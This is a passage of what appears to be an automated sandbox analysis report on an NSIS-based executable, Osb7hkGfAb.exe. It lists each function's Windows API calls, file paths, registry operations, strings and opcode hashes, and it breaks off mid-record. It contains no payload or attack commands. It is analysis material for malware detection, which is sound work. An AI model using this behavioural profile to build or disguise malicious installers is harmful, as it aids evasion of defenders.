                                                                          • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405A15
                                                                          • FindClose.KERNEL32(00000000), ref: 00405A26
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004058CC
                                                                          • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 004058BF
                                                                          • \*.*, xrefs: 0040592A
                                                                          Similarity
                                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                                          • API String ID: 2035342205-3706426567
                                                                          • Opcode ID: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                          • Instruction ID: 53fbf83e18d3e9f22f7fd61ce8145b7df245fbcc76992db59ab4b54644bc6f5f
                                                                          • Opcode Fuzzy Hash: c5c9cbc54ac5a0b6362327b9ac4809c8afb714a0d61d87f2a5b8dc3e2328684f
                                                                          • Instruction Fuzzy Hash: 4251C470A00A49AADB21AB618D85BBF7A78DF52314F14427FF841711D2C73C8942DF6A
                                                                          APIs
                                                                          • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F0
                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022A2
                                                                          Strings
                                                                          • C:\Users\user\tranchet\Trykmaalere, xrefs: 00402230
                                                                          Similarity
                                                                          • API ID: ByteCharCreateInstanceMultiWide
                                                                          • String ID: C:\Users\user\tranchet\Trykmaalere
                                                                          • API String ID: 123533781-448873956
                                                                          • Opcode ID: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                          • Instruction ID: cfd0f9f97044ed47efa98841b374527745dcc5d1cf4597a5ef188e8ddd78f045
                                                                          • Opcode Fuzzy Hash: d5ac8e536bab36e1472226809c0cdf08a9d371e862c1e59943db98e9419baf02
                                                                          • Instruction Fuzzy Hash: DF510671A00208AFCB50DFE4C989E9D7BB6FF48314F2041AAF515EB2D1DA799981CB54
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(774D3410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,774D3410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,774D3410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                                          • FindClose.KERNELBASE(00000000), ref: 00406482
                                                                          Similarity
                                                                          • API ID: Find$CloseFileFirst
                                                                          • String ID:
                                                                          • API String ID: 2295610775-0
                                                                          • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                          • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                                          • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                          • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                                          APIs
                                                                          • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                                          Similarity
                                                                          • API ID: FileFindFirst
                                                                          • String ID:
                                                                          • API String ID: 1974802433-0
                                                                          • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                          • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                                          • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                                          • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A

                                                                          Control-flow Graph
                                                                          • Entry block: 0040390A (rendered graph not reproduced)
                                                                          APIs
                                                                            • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                            • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                          • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Osb7hkGfAb.exe",00000000), ref: 00403985
                                                                          • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,774D3410), ref: 004039FA
                                                                          • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                                          • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                                          • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                                            • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                                          • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                                          • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                                          • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                                          • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                                          • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                                          • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                                          • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                                          Similarity
                                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                          • API String ID: 1975747703-789139646
                                                                          • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                          • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                                          • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                                          • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D

                                                                          Control-flow Graph
                                                                          • Entry block: 00402EA1 (rendered graph not reproduced)
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00402EB2
                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Osb7hkGfAb.exe,00000400), ref: 00402ECE
                                                                            • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00405C94
                                                                            • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                          • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Osb7hkGfAb.exe,C:\Users\user\Desktop\Osb7hkGfAb.exe,80000000,00000003), ref: 00402F1A
                                                                          • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                                          Similarity
                                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\Osb7hkGfAb.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                          • API String ID: 2803837635-232411033
                                                                          • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                          • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                                          • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                                          • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D

                                                                          Control-flow Graph
                                                                          • Entry block: 0040618A (rendered graph not reproduced)
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                                          • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                                          • SHGetSpecialFolderLocation.SHELL32(00405256,774D23A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                                          • SHGetPathFromIDListA.SHELL32(774D23A0,Call), ref: 00406312
                                                                          • CoTaskMemFree.OLE32(774D23A0), ref: 0040631E
                                                                          • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                                          • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,774D23A0), ref: 00406394
                                                                          Similarity
                                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                          • API String ID: 717251189-1230650788
                                                                          • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                          • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                                          • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                                          • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E

                                                                          Control-flow Graph
                                                                          • Entry block: 00401759 (rendered graph not reproduced)
                                                                          APIs
                                                                          • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,datastrrelsers Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,774D23A0), ref: 0040527A
                                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                          Similarity
                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc72B9.tmp$C:\Users\user\AppData\Local\Temp\nsc72B9.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                                          • API String ID: 1941528284-910802967
                                                                          • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                          • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                                          • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                                          • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D

                                                                          Control-flow Graph
                                                                          • Entry block: 004030D8 (rendered graph not reproduced)
                                                                          Similarity
                                                                          • API ID: CountTick$wsprintf
                                                                          • String ID: ... %d%%$HBB
                                                                          • API String ID: 551687249-372310663
                                                                          • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                          • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                                          • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                                          • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetDC.USER32(?), ref: 00401E38
                                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                                          • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                                          • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                                          • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: the same eight 00400000 module dumps listed for the first function above
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CapsCreateDeviceFontIndirectRelease
                                                                          • String ID: Calibri
                                                                          • API String ID: 3808545654-1409258342
                                                                          • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                          • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
                                                                          • Opcode Fuzzy Hash: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                                          • Instruction Fuzzy Hash: A9019E72500240AFE7007BB0AE4AB9A3FF8EB55311F10843EF281B61F2CB7904458B6C

                                                                          Control-flow Graph

                                                                          • Control-flow graph of function 004056E4 (basic-block diagram with executed / not-executed legend not reproduced in text)
                                                                          APIs
                                                                          • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                          • GetLastError.KERNEL32 ref: 0040573B
                                                                          • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405750
                                                                          • GetLastError.KERNEL32 ref: 0040575A
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040570A
                                                                          • C:\Users\user\Desktop, xrefs: 004056E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: the same eight 00400000 module dumps listed for the first function above
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                          • API String ID: 3449924974-3530169944
                                                                          • Opcode ID: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                          • Instruction ID: 199f41d5e308de8b96f609cf750b761cce64c3ab1ca85d652f9564a15c89f022
                                                                          • Opcode Fuzzy Hash: daf6715ee4a9a889a1accaf74548b3993ec7aecc528708590295bf6406307990
                                                                          • Instruction Fuzzy Hash: FF010471C00219EADF019BA0C944BEFBBB8EB04354F00403AD944B6290E7B89A48DBA9

                                                                          Control-flow Graph

                                                                          • Control-flow graph of function 00406492 (basic-block diagram with executed / not-executed legend not reproduced in text)
                                                                          APIs
                                                                          • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                          • wsprintfA.USER32 ref: 004064E2
                                                                          • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: the same eight 00400000 module dumps listed for the first function above
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                          • String ID: %s%s.dll$UXTHEME$\
                                                                          • API String ID: 2200240437-4240819195
                                                                          • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                          • Instruction ID: 03f82d29dddd483449b3488b7c2e1daaa1831c8d2f1a72e13e07ee25955ceb49
                                                                          • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                          • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D

                                                                          Control-flow Graph

                                                                          • Control-flow graph of function 00405CBF (basic-block diagram with executed / not-executed legend not reproduced in text)
                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 00405CD3
                                                                          • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                          Strings
                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                          • "C:\Users\user\Desktop\Osb7hkGfAb.exe", xrefs: 00405CBF
                                                                          • nsa, xrefs: 00405CCA
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: the same eight 00400000 module dumps listed for the first function above
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CountFileNameTempTick
                                                                          • String ID: "C:\Users\user\Desktop\Osb7hkGfAb.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                          • API String ID: 1716503409-2550592448
                                                                          • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                          • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                          • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                          • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758

                                                                          Control-flow Graph

                                                                          • Control-flow graph of function 00402CD0 (basic-block diagram with executed / not-executed legend not reproduced in text)
                                                                          APIs
                                                                          • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D24
                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402D70
                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D79
                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402D90
                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00402D9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: the same eight 00400000 module dumps listed for the first function above
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseEnum$DeleteValue
                                                                          • String ID:
                                                                          • API String ID: 1354259210-0
                                                                          • Opcode ID: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                          • Instruction ID: 1e980c0bf3dfe1ee8e8c0bbb525d6a304c4f3a3ada6f962fb42c7dde8bd75a6e
                                                                          • Opcode Fuzzy Hash: c08e85f7896b9a4561d683b23b3b2dae21a167d845191f4bc040fadce0444681
                                                                          • Instruction Fuzzy Hash: C6215771900108BBEF129F90CE89EEE7A7DEF44344F100076FA55B11E0E7B48E54AA68

                                                                          Control-flow Graph

                                                                          • Control-flow graph of function 700E16DB (basic-block diagram with executed / not-executed legend not reproduced in text)
                                                                          APIs
                                                                            • Part of subcall function 700E1A98: GlobalFree.KERNEL32(?), ref: 700E1D09
                                                                            • Part of subcall function 700E1A98: GlobalFree.KERNEL32(?), ref: 700E1D0E
                                                                            • Part of subcall function 700E1A98: GlobalFree.KERNEL32(?), ref: 700E1D13
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E1786
                                                                          • FreeLibrary.KERNEL32(?), ref: 700E1809
                                                                          • GlobalFree.KERNEL32(00000000), ref: 700E182E
                                                                            • Part of subcall function 700E22AF: GlobalAlloc.KERNEL32(00000040,?), ref: 700E22E0
                                                                            • Part of subcall function 700E26B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,700E1757,00000000), ref: 700E2782
                                                                            • Part of subcall function 700E156B: wsprintfA.USER32 ref: 700E1599
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2805650198.00000000700E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 700E0000, based on PE: true
                                                                          • Associated: 00000000.00000002.2805623249.00000000700E0000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805669903.00000000700E3000.00000002.00000001.01000000.00000005.sdmp
                                                                          • Associated: 00000000.00000002.2805690432.00000000700E5000.00000002.00000001.01000000.00000005.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_700e0000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: Global$Free$Alloc$Librarywsprintf
                                                                          • String ID:
                                                                          • API String ID: 3962662361-3916222277
                                                                          • Opcode ID: 89c6fd6a89110026cd407e11c9f5d14ac50fa8d4c3a06c1d75c630fdf6235f4c
                                                                          • Instruction ID: d67d54434169c7306daad1e1ea8512a736b0d0e34ecfbf701773ce831b5f9764
                                                                          • Opcode Fuzzy Hash: 89c6fd6a89110026cd407e11c9f5d14ac50fa8d4c3a06c1d75c630fdf6235f4c
                                                                          • Instruction Fuzzy Hash: DF4180B21042049EDB01BB76DDC5BDE37FDBB04E30F1484A9E947BA296DB749845CBA0

                                                                          Control-flow Graph

                                                                          • Control-flow graph of function 00401C2E (basic-block diagram with executed / not-executed legend not reproduced in text)
                                                                          APIs
                                                                          • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C9E
                                                                          • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CB6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: the same eight 00400000 module dumps listed for the first function above
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Timeout
                                                                          • String ID: !
                                                                          • API String ID: 1777923405-2657877971
                                                                          • Opcode ID: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                          • Instruction ID: ba3ca6c87ae36af76b9178a01453159e8aa8f3f4b54328e0dc7fa76aa85262fd
                                                                          • Opcode Fuzzy Hash: b3808b2228016cded034fddbbda71ccd0a5c26c3e8a9a8fe6146862fd49d124c
                                                                          • Instruction Fuzzy Hash: 10216071A44208BEEB05AFB5D98AAAD7FB4EF44304F20447FF502B61D1D6B88541DB28

                                                                          Control-flow Graph (image residue; only the recoverable information is kept): basic blocks 402476-402a69, with calls to 402bce, 402c5e, 402bac, 4030d8, lstrlenA, RegSetValueExA and RegCloseKey.
                                                                          APIs
                                                                          • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000023,00000011,00000002), ref: 004024C1
                                                                          • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000000,00000011,00000002), ref: 00402501
                                                                          • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsc72B9.tmp,00000000,00000011,00000002), ref: 004025E5
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: CloseValuelstrlen
                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsc72B9.tmp
                                                                          • API String ID: 2655323295-1466346684
                                                                          • Opcode ID: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                          • Instruction ID: f8068cdfa95035626473adca5f51816a5c1db3e2bbb00f719c7efdf62c59a762
                                                                          • Opcode Fuzzy Hash: 7a7c23c04c90be8b3e585445916e0e680a3a1629c3414f9b9df94d306a1b16c3
                                                                          • Instruction Fuzzy Hash: 12118171E00218AFEF10AFA59E89EAE7A74EB44314F20443BF505F71D1D6B99D419B28
                                                                          APIs
                                                                          • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,774D23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,774D23A0), ref: 0040527A
                                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                            • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                          • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                          • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2778663305.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2778645516.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778683444.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778709148.0000000000455000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2778823275.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_Osb7hkGfAb.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                          • String ID:
                                                                          • API String ID: 2987980305-0
                                                                          • Opcode ID: 2b161932b8e15f20ea054abb7da5fd45cac2ee1996f8da02ed958f71ebdc799e
